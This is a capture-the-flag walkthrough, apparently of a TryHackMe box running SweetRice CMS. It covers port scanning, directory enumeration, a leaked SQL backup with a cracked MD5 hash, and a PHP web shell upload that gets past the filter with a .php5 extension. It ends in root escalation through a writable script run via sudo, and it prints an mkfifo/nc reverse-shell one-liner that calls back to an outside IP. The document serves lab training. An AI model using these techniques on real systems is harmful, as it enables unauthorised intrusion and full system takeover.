Nmap

First we scan for open ports

# nmap -p- -T4 -sV -sC 10.10.68.91 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 00:23 GMT
Nmap scan report for 10.10.68.91
Host is up (0.021s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.67 seconds

Website

Looking at the website it is just the standard ubuntu apache site, so straight to gobuster

# gobuster dir -u http://10.10.68.91 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.68.91
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 276]
/.htpasswd            (Status: 403) [Size: 276]
/.htaccess            (Status: 403) [Size: 276]
/content              (Status: 301) [Size: 312] [--> http://10.10.68.91/content/]
/index.html           (Status: 200) [Size: 11321]
/server-status        (Status: 403) [Size: 276]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

This reveals the /content/ directory and navigating there we can see a simple page presenting by SweetRice CMS

Checking exploit-db reveals a backup disclosure and navigating to the URL does indeed give us access to a sql backup

After downloading the sql file and looking inside it a line stands out

The hash looks like an md5 and a quick visit to crackstation gives us the password. With this we can now login to the site. Looking through available exploits it looks like we can upload files using the Media Center part of the CMS. Lets upload a basic php shell. The site didnt accept .php files, however simply renaming it to .php5 worked around this

Using this webshell we can get a reverse webshell back and get the user flag

# nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.11.18.78] from (UNKNOWN) [10.10.68.91] 53012
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls /home 
itguy
$ cd /home/itguy
$ ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
backup.pl
examples.desktop
mysql_login.txt
user.txt
$ cat user.txt
THM{6******************************7}

Privilege escalation

Checking the users sudo privileges we see they can execute a script

$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

Looking at the script we dont have permission to change it, but it actually calls another script which we do have permissions over

$ ls -l /home/itguy/backup.pl
-rw-r--r-x 1 root root 47 Nov 29  2019 /home/itguy/backup.pl
$ cat /home/itguy/backup.pl
#!/usr/bin/perl

system("sh", "/etc/copy.sh");
$ ls -l /etc/copy.sh
-rw-r--rwx 1 root root 81 Nov 29  2019 /etc/copy.sh
$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

After replacing the IP in the /etc/copy.sh script, we can start a listener and call the first script to reverse shell back as root

# nc -lvnp 5554
listening on [any] 5554 ...
connect to [10.11.18.78] from (UNKNOWN) [10.10.68.91] 49640
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
THM{6******************************f}